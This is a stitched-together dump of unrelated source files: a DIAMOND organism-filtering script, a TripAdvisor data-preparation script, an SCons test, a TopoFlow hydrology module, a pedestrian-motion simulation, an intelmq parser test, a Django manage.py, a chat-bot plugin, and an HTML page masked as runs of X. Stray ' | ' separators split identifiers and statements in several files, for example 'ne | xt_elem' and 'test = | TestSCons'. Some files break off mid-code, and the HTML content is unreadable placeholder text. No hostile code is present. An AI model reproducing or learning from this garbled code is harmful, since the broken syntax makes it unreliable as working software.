for idx, elem in enumerate(sys.argv):
this_elem = elem
next_elem = sys.argv[(idx + 1) % len(sys.argv)]
second_elem = sys.argv[(idx + 2) % len(sys.argv)]
if elem == "-SO":
target_org = ne | xt_elem + " " + second_elem
if "-O" in sys.argv:
target_org_outfile = open(string_find("-O"), "w")
else:
target_org_outfile = open(infile_name[:-4] + "_" + target_org + ".tsv", "w")
else:
sys.exit("Need to specify target organism or function to filter by, using -SO flag.")
# loading database file
if "-D" in sys.argv: |
db = open(string_find("-D"), "r")
else:
sys.exit("WARNING: database must be specified using '-D' flag.")
# Getting the database assembled
db_org_dictionary = {}
db_id_dictionary = {}
db_line_counter = 0
db_error_counter = 0
t0 = time.time()
for line in db:
if line.startswith(">") == True:
db_line_counter += 1
# line counter to show progress
if db_line_counter % 1000000 == 0: # each million
t95 = time.time()
print (str(db_line_counter) + " lines processed so far in " + str(t95-t0) + " seconds.")
if target_org in line:
splitline = line.split(" ")
# ID, the hit returned in DIAMOND results
db_id = str(splitline[0])[1:].split(" ")[0]
# name and functional description
db_entry = line.split("[", 1)
db_entry = db_entry[0].split(" ", 1)
db_entry = db_entry[1][:-1]
# organism name
if line.count("[") != 1:
splitline = line.split("[")
db_org = splitline[line.count("[")].strip()[:-1]
if db_org[0].isdigit():
split_db_org = db_org.split()
try:
db_org = split_db_org[1] + " " + split_db_org[2]
except IndexError:
try:
db_org = split_db_org[1]
except IndexError:
db_org = splitline[line.count("[")-1]
if db_org[0].isdigit():
split_db_org = db_org.split()
db_org = split_db_org[1] + " " + split_db_org[2]
else:
db_org = line.split("[", 1)
db_org = db_org[1].split()
try:
db_org = str(db_org[0]) + " " + str(db_org[1])
except IndexError:
db_org = line.strip().split("[", 1)
db_org = db_org[1][:-1]
db_error_counter += 1
db_org = re.sub('[^a-zA-Z0-9-_*. ]', '', db_org)
# add to dictionaries
db_org_dictionary[db_id] = db_org
db_id_dictionary[db_id] = db_entry
db.close()
print ("Database is read and set up, moving on to the infile...")
infile = open (infile_name, "r")
# setting up databases
RefSeq_hit_count_db = {}
unique_seq_db = {}
line_counter = 0
hit_counter = 0
t1 = time.time()
# reading through the infile
for line in infile:
line_counter += 1
splitline = line.split("\t")
try:
target_org_outfile.write(splitline[0] + "\t" + splitline[1] + "\t" + db_org_dictionary[splitline[1]] + "\t" + db_id_dictionary[splitline[1]] + "\n")
hit_counter += 1
except KeyError:
continue
if line_counter % 1000000 == 0:
t99 = time.time()
print (str(line_counter)[:-6] + "M lines processed so far in " + str(t99-t1) + " seconds.")
# results stats
t100 = time.time()
print ("Run complete!")
print ("Number of sequences found matching target query, " + target_org + ":\t" + str(hit_counter))
print ("Time elapsed: " + str(t100-t0) + " seconds.")
infile.close()
target_org_outfile.close()
|
rchurch4/georgetown-data-science-fall-2015 | data_preparation/data_preparation_trip_advisor.py | Python | mit | 4,646 | 0.007964 | # Ravi Makhija
# data_preparation_trip_advisor.py
# Version 4.2
#
# Description:
# This script takes as input the json files generated
# from scraping TRIP ADVISOR, and initiates the following
# data preparation sequence:
# 1) Converts json to csv, making each row of the
# csv a unique review with restaurant info merged
# in.
# 2) Updates geocode lookup table with any new
# geocodes required.
# 3) Adds extra features to the data set and does
# some data cleaning along the way, outputting
# a final csv.
#
# Run from shell:
# python data_preparation_trip_advisor.py
#
# File Dependencies:
# data/geocode_lookup_table.csv
# data/Washington_DC_District_of_Columbia_basic_list.json
# input_file_paths (specified as variable in script)
#
# Script Dependencies:
# data_preparation_lib/json_to_csv_trip_advisor.py
# data_preparation_lib/update_geocode_lookup_table.py
# data_preparation_lib/clean_and_feature_generation_trip_advisor.py
# data_preparation_lib/change_extension_to_csv
#
# References:
# Problem: Importing functions from other files for use in this script.
# http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python
import os
import sys
sys.path.insert(0, './data_preparation_lib') # from github folder root
from json_to_csv_trip_advisor import json_to_csv_trip_advisor
from update_geocode_lookup_table import update_geocode_lookup_table
from clean_and_feature_generation_trip_advisor import clean_and_feature_generation_trip_advisor
from change_extension_to_csv import change_extension_to_csv
################
# Set Data File Paths (User-defined)
#
# Details:
# input_file_paths should be given as a list of strings.
#
# There is also an optional section to dynamically generate
# file names, if they are structured as 'root_#_ending'.
################
####
# Optional - dynamically generate input file paths
make_input_file_paths = []
start_num = 42 # user-defined
end_num = 50 # user-defined
for i in range(start_num, end_num + 1):
path_root = 'data/Washington_DC_District_of_Columbia_review_list' # user-defined
path_ending = '.json' # user-defined
current_path = path_root + str(i) + path_ending
make_input_file_paths.append(current_path)
####
# Mandatory - Set paths
#input_file_paths = ['data/Washington_DC_District_of_Columbia_review_list40.json']
input_file_paths = make_input_file_paths # use this if dynamically | generating file paths above
################
# We proceed with a user prompt, then the data preparation sequence
###### | ##########
# Warn user about possibly overwriting csvs.
# Uses a loop to ensure valid input.
# Also, prompt the user to enter in the city that corresponds to
# the restaurants in the input data. Since restaurant location is
# not a field in the input data, this has to be set at run time,
# and this also means all the input data should correspond to only
# one restaurant location each time this script is run.
#
# As a further note, at this stage, we only have data on DC and
# Nashville, which is why only these two options are given.
current_user_prompt = "\nThis script will overwrite any csv files with the same name. Therefore, you should make sure that input_file_paths is correct in the script before running. \n\nTo proceed, type either 'DC' or 'Nashville' depending on your input data. Otherwise, type 'q' to abort: "
while True:
user_proceed_response = raw_input(current_user_prompt)
if user_proceed_response.lower() != 'dc' and user_proceed_response.lower() != 'nashville' and user_proceed_response.lower() != 'q':
current_user_prompt = '\nPlease enter one of "DC", "Nashville", or "q": '
elif user_proceed_response.lower() == 'q':
print 'Aborting data preparation sequence.'
break
elif user_proceed_response.lower() == 'dc' or user_proceed_response.lower() == 'nashville':
if user_proceed_response.lower() == 'dc':
my_restaurant_location = 'Washington, DC'
elif user_proceed_response.lower() == 'nashville':
my_restaurant_location = 'Nashville, TN'
print '\nStarting data preparation sequence. \n'
# json to csv conversion
json_to_csv_trip_advisor(input_file_paths, my_restaurant_location)
# update geocode lookup table
input_file_paths_csv = change_extension_to_csv(input_file_paths)
update_geocode_lookup_table(input_file_paths_csv)
# add features and do some data cleaning
clean_and_feature_generation_trip_advisor(input_file_paths_csv)
break # exit user prompt loop
|
datalogics/scons | test/ParseDepends.py | Python | mit | 5,431 | 0.002578 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os.path
import string
import TestSCons
_python_ = TestSCons._python_
test = | TestSCons.TestSCons()
test.subdir('subdir', 'sub2')
test.write( | 'build.py', r"""
import sys
contents = open(sys.argv[2], 'rb').read() + open(sys.argv[3], 'rb').read()
file = open(sys.argv[1], 'wb')
file.write(contents)
file.close()
""")
test.write('SConstruct', """
Foo = Builder(action = r'%(_python_)s build.py $TARGET $SOURCES subdir/foo.dep')
Bar = Builder(action = r'%(_python_)s build.py $TARGET $SOURCES subdir/bar.dep')
env = Environment(BUILDERS = { 'Foo' : Foo, 'Bar' : Bar }, SUBDIR='subdir')
env.ParseDepends('foo.d')
env.ParseDepends('bar.d')
env.Foo(target = 'f1.out', source = 'f1.in')
env.Foo(target = 'f2.out', source = 'f2.in')
env.Bar(target = 'subdir/f3.out', source = 'f3.in')
SConscript('subdir/SConscript', "env")
env.Foo(target = 'f5.out', source = 'f5.in')
env.Bar(target = 'sub2/f6.out', source = 'f6.in')
""" % locals())
test.write('foo.d', "f1.out f2.out: %s\n" % os.path.join('subdir', 'foo.dep'))
test.write('bar.d', "%s: %s\nf5.out: sub2" % (os.path.join('subdir', 'f3.out'),
os.path.join('subdir', 'bar.dep')))
test.write(['subdir', 'SConscript'], """
Import("env")
ParseDepends('bar.d')
env.Bar(target = 'f4.out', source = 'f4.in')
""")
test.write(['subdir', 'bar.d'], "f4.out: bar.dep\n")
test.write('f1.in', "f1.in\n")
test.write('f2.in', "f2.in\n")
test.write('f3.in', "f3.in\n")
test.write(['subdir', 'f4.in'], "subdir/f4.in\n")
test.write('f5.in', "f5.in\n")
test.write('f6.in', "f6.in\n")
test.write(['subdir', 'foo.dep'], "subdir/foo.dep 1\n")
test.write(['subdir', 'bar.dep'], "subdir/bar.dep 1\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 1\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 1\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 1\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 1\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 1\n")
test.must_match(['sub2', 'f6.out'], "f6.in\nsubdir/bar.dep 1\n")
#
test.write(['subdir', 'foo.dep'], "subdir/foo.dep 2\n")
test.write(['subdir', 'bar.dep'], "subdir/bar.dep 2\n")
test.write('f6.in', "f6.in 2\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 2\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 2\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 2\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 2\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 2\n")
test.must_match(['sub2', 'f6.out'], "f6.in 2\nsubdir/bar.dep 2\n")
#
test.write(['subdir', 'foo.dep'], "subdir/foo.dep 3\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 3\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 3\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 2\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 2\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 2\n")
test.must_match(['sub2', 'f6.out'], "f6.in 2\nsubdir/bar.dep 2\n")
#
test.write(['subdir', 'bar.dep'], "subdir/bar.dep 3\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 3\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 3\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 3\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 3\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 2\n")
test.must_match(['sub2', 'f6.out'], "f6.in 2\nsubdir/bar.dep 2\n")
#
test.write('f6.in', "f6.in 3\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 3\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 3\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 3\n")
test.must_match(['subdir', 'f4.out'], "subdir/f4.in\nsubdir/bar.dep 3\n")
test.must_match('f5.out', "f5.in\nsubdir/foo.dep 3\n")
test.must_match(['sub2', 'f6.out'], "f6.in 3\nsubdir/bar.dep 3\n")
test.write('SConstruct', """
ParseDepends('nonexistent_file')
""")
test.run()
test.write('SConstruct', """
ParseDepends('nonexistent_file', must_exist=1)
""")
test.run(status=2, stderr=None)
test.fail_test(string.find(test.stderr(), "No such file or directory") == -1)
test.pass_test()
|
mperignon/component_creator | topoflow_creator/topoflow/channels_base.py | Python | gpl-2.0 | 124,876 | 0.012324 |
## See "d_bankfull" in update_flow_depth() ######## (2/21/13)
## See "(5/13/10)" for a temporary fix.
#------------------------------------------------------------------------
# Copyright (c) 2001-2014, Scott D. Peckham
#
# Sep 2014. Wrote new update_diversions().
# New standard names and BMI updates and testing.
# Nov 2013. Converted TopoFlow to a Python package.
# Feb 2013. Adapted to use EMELI framework.
# Jan 2013. Shared scalar doubles are now 0D numpy arrays.
# This makes them mutable and allows components with
# a reference to them to see them change.
# So far: Q_outlet, Q_peak, Q_min...
# Jan 2013. Revised handling of input/output names.
# Oct 2012. CSDMS Standard Names and BMI.
# May 2012. Commented out diversions.update() for now. #######
# May 2012. Shared scalar doubles are now 1-element 1D numpy arrays.
# This makes them mutable and allows components with
# a reference to them to see them change.
# So far: Q_outlet, Q_peak, Q_min...
# May 2010. Changes to initialize() and read_cfg_file()
# Mar 2010. Changed codes to code, widths to width,
# angles to angle, nvals to nval, z0vals to z0val,
# slopes to slope (for GUI tools and consistency
# across all process components)
# Aug 2009. Updates.
# Jul 2009. Updates.
# May 2009. Updates.
# Jan 2009. Converted from IDL.
#-----------------------------------------------------------------------
# NB! In the CFG file, change MANNING and LAW_OF_WALL flags to
# a single string entry like "friction method". #########
#-----------------------------------------------------------------------
# Notes: Set self.u in manning and law_of_wall functions ??
# Update friction factor in manning() and law_of_wall() ?
# Double check how Rh is used in law_of_the_wall().
# d8_flow has "flow_grids", but this one has "codes".
# Make sure values are not stored twice.
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
# NOTES: This file defines a "base class" for channelized flow
# components as well as functions used by most or
# all channel flow methods. The methods of this class
# (especially "update_velocity") should be over-ridden as
# necessary for different methods of modeling channelized
# flow. See channels_kinematic_wave.py,
# channels_diffusive_wave.py and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
# NOTES: update_free_surface_slope() is called by the
# update_velocity() methods of channels_diffusive_wave.py
# and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
#
# class channels_component
#
# ## get_attribute() # (defined in each channel component)
# get_input_var_names() # (5/15/12)
# get_output_var_names() # (5/15/12)
# get_var_name() # (5/15/12)
# get_var_units() # (5/15/12)
#-----------------------------
# set_constants()
# initialize()
# update()
# finalize()
# set_computed_input_vars() # (5/11/10)
#----------------------------------
# initialize_d8_vars() ########
# initialize_computed_vars()
# initialize_diversion_vars() # (9/22/14)
# initialize_outlet_values()
# initialize_peak_values()
# initialize_min_and_max_values() # (2/3/13)
#-------------------------------------
# update_R()
# update_R_integral()
# update_discharge()
# update_diversions() # (9/22/14)
# update_flow_volume()
# update_flow_depth()
# update_free_surface_slope()
# update_shear_stress() # (9/9/14, dep | th-slope product)
# update_shear_speed() # (9/9/14)
# update_trapezoid_Rh()
# update_friction_factor() # (9/9/14)
#----------------------------------
# update_velocity() # (override as needed)
# update_velocity_on_edges()
# update_froude_number() # (9/9/14)
#----------------------------------
# update_outlet_values()
# update_ | peak_values() # (at the main outlet)
# update_Q_out_integral() # (moved here from basins.py)
# update_mins_and_maxes() # (don't add into update())
# check_flow_depth()
# check_flow_velocity()
#----------------------------------
# open_input_files()
# read_input_files()
# close_input_files()
#----------------------------------
# update_outfile_names()
# bundle_output_files() # (9/21/14. Not used yet)
# open_output_files()
# write_output_files()
# close_output_files()
# save_grids()
# save_pixel_values()
#----------------------------------
# manning_formula()
# law_of_the_wall()
# print_status_report()
# remove_bad_slopes()
# Functions: # (stand-alone versions of these)
# Trapezoid_Rh()
# Manning_Formula()
# Law_of_the_Wall()
#-----------------------------------------------------------------------
import numpy as np
import os, os.path
from topoflow.utils import BMI_base
# from topoflow.utils import d8_base
from topoflow.utils import file_utils ###
from topoflow.utils import model_input
from topoflow.utils import model_output
from topoflow.utils import ncgs_files ###
from topoflow.utils import ncts_files ###
from topoflow.utils import rtg_files ###
from topoflow.utils import text_ts_files ###
from topoflow.utils import tf_d8_base as d8_base
from topoflow.utils import tf_utils
#-----------------------------------------------------------------------
class channels_component( BMI_base.BMI_component ):
#-----------------------------------------------------------
# Note: rainfall_volume_flux *must* be liquid-only precip.
#-----------------------------------------------------------
_input_var_names = [
'atmosphere_water__rainfall_volume_flux', # (P_rain)
'glacier_ice__melt_volume_flux', # (MR)
## 'land_surface__elevation',
## 'land_surface__slope',
'land_surface_water__baseflow_volume_flux', # (GW)
'land_surface_water__evaporation_volume_flux', # (ET)
'soil_surface_water__infiltration_volume_flux', # (IN)
'snowpack__melt_volume_flux', # (SM)
'water-liquid__mass-per-volume_density' ] # (rho_H2O)
#------------------------------------------------------------------
# 'canals__count', # n_canals
# 'canals_entrance__x_coordinate', # canals_in_x
# 'canals_entrance__y_coordinate', # canals_in_y
# 'canals_entrance_water__volume_fraction', # Q_canals_fraction
# 'canals_exit__x_coordinate', # canals_out_x
# 'canals_exit__y_coordinate', # canals_out_y
# 'canals_exit_water__volume_flow_rate', # Q_canals_out
# 'sinks__count', # n_sinks
# 'sinks__x_coordinate', # sinks_x
# 'sinks__y_coordinate', # sinks_y
# 'sinks_water__volume_flow_rate', # Q_sinks
# 'sources__count', # n_sources
# 'sources__x_coordinate', # sources_x
# 'sources__y_coordinate', # sources_y
# 'sources_water__volume_flow_rate' ] # Q_sources
#----------------------------------
# Maybe add these out_vars later.
#----------------------------------
# ['time_sec', 'time_min' ]
_output_var_names = [
'basin_outlet_water_flow__half_of_fanning_friction_factor', # f_outlet
'bas |
yuhangc/planning_algorithms | environment/robots/humans.py | Python | mit | 1,684 | 0 | from environment.robots.robot2d_base import Robot2dCircular
from environment.robots.robot_utils import *
class HumanSimple(Robot2dCircular):
def __init__(self, size=0.3, max_vel=2.0, max_acc=5.0, uncertainty=0.0):
super(HumanSimple, self).__init__(size)
self.max_v = max_vel
self.max_acc = max_acc
self.v_std = uncertainty
self.vx = 0.0
self.vy = 0.0
self.x_goal = None
self.vd = None
self.k = None
# a damping factor
self.c = 0.1
def set_goal(self, x_goal, vd, k):
self.x_goal = x_goal
self.vd = vd
self.k = k
| def update(self, u, dt):
"""
Dynamic update, input is the "social force" that drives people
:param u: (fx, fy)
:param dt: time step
"""
# calculate the force that drives people to goal
x_rel_goal = self.x_goal - np.array([self.x, self.y])
v_goal | = self.vd * x_rel_goal / np.linalg.norm(x_rel_goal)
f_goal_x = self.k * (v_goal[0] - self.vx)
f_goal_y = self.k * (v_goal[1] - self.vy)
# calculate accelerations
ax = f_goal_x + u[0] - self.c * self.vx
ay = f_goal_y + u[1] - self.c * self.vy
# update velocity and positions
vx_next = self.vx + ax * dt
vy_next = self.vy + ay * dt
v_next = np.linalg.norm(np.array([vx_next, vy_next]))
if v_next > self.max_v:
vx_next *= self.max_v / v_next
vy_next *= self.max_v / v_next
self.x += 0.5 * (self.vx + vx_next) * dt
self.y += 0.5 * (self.vy + vy_next) * dt
self.vx = vx_next
self.vy = vy_next
|
sch3m4/intelmq | intelmq/tests/bots/parsers/dragonresearchgroup/test_parser_ssh.py | Python | agpl-3.0 | 598 | 0.001672 | # -*- coding: utf-8 -*-
from __future__ import unicode_litera | ls
import json
import unittest
import intelmq.lib.test as test
from intelmq.bots.parsers.dragonresearchgroup.parser_ssh import \
DragonResearchGroupSSHParserBot
class TestDragonResearchGroupSSHParserBot(test.BotTestCase, unittest.TestCase):
"""
A TestCase for DragonResearchGroupSSHParserBot.
"""
@classmethod
def set_bot(self):
self.bot_reference = DragonResearchGroupSSHParserBot
self.default_input_message = json.dumps({'__type': 'Report'})
if __name_ | _ == '__main__':
unittest.main()
|
individual-it/office-traffic-light | manage.py | Python | gpl-3.0 | 804 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "office.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import | may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
| "Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
Fogapod/VKBot | bot/plugins/plugin_stop.py | Python | mit | 684 | 0.001894 | # co | ding:utf8
class Plugin(object):
__doc__ = '''Плагин предназначен для остановки бота.
Для использования необходимо иметь уровень доступа {protection} или выше
Ключевые слова: [{keywords}]
Использование: {keyword}
Пример: {keyword}'''
name = 'stop'
keywords = (u'стоп', name, '!')
protection = 3
argument_required = False
def respond(self, msg, rsp, utils, *args, **kwargs):
utils.stop_bot()
rsp.text = u'Завершаю работу. Удачного времени суток!'
| return rsp |
dnaextrim/django_adminlte_x | adminlte/static/plugins/datatables/extensions/ColReorder/examples/simple.html.py | Python | mit | 17,013 | 0.036972 | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX XXXXXXX X XXXXX XXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXXXXXXXXXXXXXXXXXXXXX X
XXXX XXXXXXXXX
X XX
X XX
XXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXXXXXXXXX XXXXXXX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXX
XXXXXXX XXXXXXX XXXXX XXX XXXXX XXX XXXX XX XXX XXXXXXXXXX XXXXXXXX XXXX XXXXXXXXXX XXXXXXX XXX X XXXXXX XXX XXXX XXX XXX XXXXXXX XX XXXXX XXX XXXX XXX XXXXX
XXXXXX XXXXX XXX XXXX XX XXXXX XXXX XXXX XXX XXXXXX XX XX XXXXXXXXX XXX XXXXXX XXXXX XX XXXXX XXXXXXXXX XXX XXX XXXXXX XXXXXXXXXX XX XXXX XX XXXX XX XXX XXXXX
XXXXXX XX XXXXXXXXXXXXX
XXXXXXXXXXXXX XX XXXXX XX X XXXXXXXXX XXXXXXX XXX XXXXXXXXXXXXXX XXXXXXXXX XXXX XX XXXX XX XXXXXXXXXX XXXXXXX XXXXXXXXX XXXX XXXXX XXXX XXX XXXXXX XXX XXX
XXXXXXXXX XXXXXXXXXXXXXX XX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXX XXXXXX
XXXXXXXXXXX XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXX XXXX XXXXX XX XXX XXXXXXXXXX X XX XXXXX XX XXX XXXXXXX XXXXXXXXXX
XXXXXX
XXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXX
XXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXX
XXXXX
XXXXXXXX
XXXXXXX
XXXX
XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXXX
XXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXX
XXXXX
XXXXXXXX
XXXXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXX | XXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
X | XXXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXX
XXXXXXXXXX XXXXXXXXX XXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXX
XXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXX XXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXXXX
XXXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXXXX
XXXXXXXXXX XXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
